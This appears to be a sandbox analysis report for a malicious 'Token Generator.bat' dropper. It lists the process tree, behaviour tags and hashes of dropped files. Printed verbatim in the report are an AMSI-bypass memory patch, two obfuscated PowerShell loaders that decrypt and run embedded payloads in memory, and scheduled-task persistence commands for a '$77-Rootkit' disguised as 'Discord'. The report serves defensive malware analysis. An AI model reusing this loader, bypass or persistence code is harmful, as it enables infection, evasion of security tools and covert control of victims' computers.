'i'+'.'+''+[Char](100)+''+[Char](108)+'l');$tgQcBgLTVEjOFCNGF=$MveFiCXPazIWBg.Invoke($Null,@([Object]$dJGSyHL,[Object]('A'+[Char](109)+''+[Char](115)+''+[Char](105)+''+'S'+''+[Char](99)+'an'+[Char](66)+''+[Char](117)+''+[Char](102)+''+'f'+''+'e'+''+[Char](114)+'')));$yxgjiOxHND=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($TeOfagDmBPjdtxmlx,$htlniFmKNyzoxgyyeqbyRT).Invoke($tgQcBgLTVEjOFCNGF,[uint32]8,4,[ref]$yxgjiOxHND);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$tgQcBgLTVEjOFCNGF,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($TeOfagDmBPjdtxmlx,$htlniFmKNyzoxgyyeqbyRT).Invoke($tgQcBgLTVEjOFCNGF,[uint32]8,0x20,[ref]$yxgjiOxHND);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+'F'+''+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+'E').GetValue(''+[Char](36)+'7'+'7'+''+[Char](115)+''+[Char](116)+''+[Char](97)+'g'+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3748
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵PID:1268
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1340
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1384
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
PID:1400
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1452
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1464
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1560
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2732
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1708
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1748
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:1768
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1812
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1884
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1968
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1976
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1964
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1852
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2132
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2272
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2368
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2388
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵
- Drops file in System32 directory
PID:2432
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2448
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2484
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2564
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2580
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2596
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2624
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:536
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:2620
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3308
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Token Generator.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:2000 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1164
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('l7xIjD7w3X9IZsoce95u+FWxpwh41oGtZjuJWP8Q3+U='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7Ji4GPB6lVnv6Xlch9sujw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $aXkIe=New-Object System.IO.MemoryStream(,$param_var); $bzUdJ=New-Object System.IO.MemoryStream; $mnRoM=New-Object System.IO.Compression.GZipStream($aXkIe, [IO.Compression.CompressionMode]::Decompress); $mnRoM.CopyTo($bzUdJ); $mnRoM.Dispose(); $aXkIe.Dispose(); $bzUdJ.Dispose(); $bzUdJ.ToArray();}function execute_function($param_var,$param2_var){ $ncCdx=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $NjXjX=$ncCdx.EntryPoint; $NjXjX.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Token Generator.bat';$jtmXF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Token Generator.bat').Split([Environment]::NewLine);foreach ($yxuaZ in $jtmXF) { if ($yxuaZ.StartsWith(':: ')) { $FJFrF=$yxuaZ.Substring(3); break; }}$payloads_var=[string[]]$FJFrF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4568 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_520_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_520.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3332 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_520.vbs"4⤵
- Suspicious use of WriteProcessMemory
PID:908 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_520.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:3664 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:1740
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('l7xIjD7w3X9IZsoce95u+FWxpwh41oGtZjuJWP8Q3+U='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7Ji4GPB6lVnv6Xlch9sujw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $aXkIe=New-Object System.IO.MemoryStream(,$param_var); $bzUdJ=New-Object System.IO.MemoryStream; $mnRoM=New-Object System.IO.Compression.GZipStream($aXkIe, [IO.Compression.CompressionMode]::Decompress); $mnRoM.CopyTo($bzUdJ); $mnRoM.Dispose(); $aXkIe.Dispose(); $bzUdJ.Dispose(); $bzUdJ.ToArray();}function execute_function($param_var,$param2_var){ $ncCdx=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $NjXjX=$ncCdx.EntryPoint; $NjXjX.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_520.bat';$jtmXF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_520.bat').Split([Environment]::NewLine);foreach ($yxuaZ in $jtmXF) { if ($yxuaZ.StartsWith(':: ')) { $FJFrF=$yxuaZ.Substring(3); break; }}$payloads_var=[string[]]$FJFrF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1776 -
C:\Users\Admin\AppData\Local\Temp\Token Generator.exe"C:\Users\Admin\AppData\Local\Temp\Token Generator.exe"7⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1696 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe" /rl HIGHEST /f8⤵
- Creates scheduled task(s)
PID:1020 -
C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe"C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3400 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe" /rl HIGHEST /f9⤵
- Creates scheduled task(s)
PID:4184 -
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"7⤵
- Executes dropped EXE
PID:4768 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe" /rl HIGHEST /f7⤵
- Creates scheduled task(s)
PID:2096 -
C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe"C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe"7⤵
- Executes dropped EXE
PID:4400
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3428
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:3472
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3792
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3872
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3940
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc1⤵PID:3964
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵PID:4248
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc1⤵PID:4332
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:916
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:1004
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:2068
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:4104
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4876
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:1652
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:2208
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:784
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3404
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Suspicious behavior: EnumeratesProcesses
PID:1128
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5df472dcddb36aa24247f8c8d8a517bd7
SHA16f54967355e507294cbc86662a6fbeedac9d7030
SHA256e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6
SHA51206383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca
-
Filesize
1KB
MD5eb15ee5741b379245ca8549cb0d4ecf8
SHA13555273945abda3402674aea7a4bff65eb71a783
SHA256b605e00d6056ae84f253f22adf37d6561a86d230c26fba8bfb39943c66e27636
SHA5121f71fe8b6027feb07050715107039da89bb3ed5d32da9dca0138c393e0d705ebf3533bcccec49e70a44e0ec0c07809aef6befa097ad4ced18ca17ae98e6df0e4
-
Filesize
163KB
MD5b51552b77057c2405f73bbbf9c89234a
SHA14793adbba023f90d2d2ad0ec55199c56de815224
SHA256720e6962d75e37e8b47b160c5b3f60433a341f00abf60041630116b26858fbb0
SHA512564f4104e6e398eeef8acc7ce7cab694b6eebbe4233b7cb359829242b949dc7c5bf124a550a4d0402eb7da19b8bec6c1f6753563b17a8ae36fb639be595b8d66
-
Filesize
3.1MB
MD56d2ad4ada4961027832e557db06fc08d
SHA1816018499f5e291850d7dd2a0d15c914e5607630
SHA256139ce0f6ed1d745a6776f831c641b2b30bb8d48ecd9c198a0b4bd8489899f60e
SHA5121d99985c99fa16f712eee5604279463e18e77532e7a1586651178685ef38ba25b099c393edc44f2703d7e9f4ce7596b86ba3d9f0e00119e13474816a2186f241
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
440KB
MD50e9ccd796e251916133392539572a374
SHA1eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204
SHA256c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221
SHA512e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d
-
Filesize
3.5MB
MD5e984ebea899379a8c0a47f9308c7370b
SHA1863330006bef4c55a1bc79771ae989dc0412f717
SHA2569f413ae8218ec74eb61a052e1c2b8b27f8ee7038902db5aaea9c93e0752fa48b
SHA51270934def86e93b350e72711e757cbe0a97a9a58259f184e2c97aeea3a2b9f016bb03e4fb499f3876248bfb43edec5e3949599448d95235afcb1b46d71362b975
-
Filesize
115B
MD5ad41673e76bc43131e958f4706b4e25d
SHA10f4449fa9e177328931dba068bc22739d553fcb9
SHA256b09f12cd88f173a0e3a759b34d3defd5277a87e73af643a19a5af5d3b41bef35
SHA512ff7f216d09a67c3dc371b06288c1e9594741f8bee3cdc895bca9a9d25eba7909b7954f1155d829ea0861adbca1c4b62f5eb606160a18de7fbb672e233045e5d1
-
C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
Filesize338B
MD5ff78083b672a56a3981c1453f7eb4b4c
SHA14953210d5a3e6ed72a8f259288ad9aca47ad1278
SHA256ccd74c04d87f2cd7d6d30a2f55e6efc644f12ef4fc3dee71d7518a6e9117558c
SHA51217a99eaf95a887ccb57332650397d77a7a1b1452b179f7452c07fbfeba9c4d69505adedb2413007869496075ef1569f2da28ac569cb772e0f90d6a59ad5b2afc
-
C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187
Filesize412B
MD5927a161f3652533ce1bf9200b563305e
SHA1961dd03f67bbc328f1d436ae41e613e7c07d339b
SHA256f51e58a04b87b80653c3ad8430799ebdaf6dfc93687ce62b56f4fe529480bc69
SHA5124f75142bd13594581a8c0350fe98b9ed77eb83681de9d2a936f687b15cc7bc8c38566a7ba76890666bd889fbf9222b71bb63288e5b5f16989e13b8ca9184d02f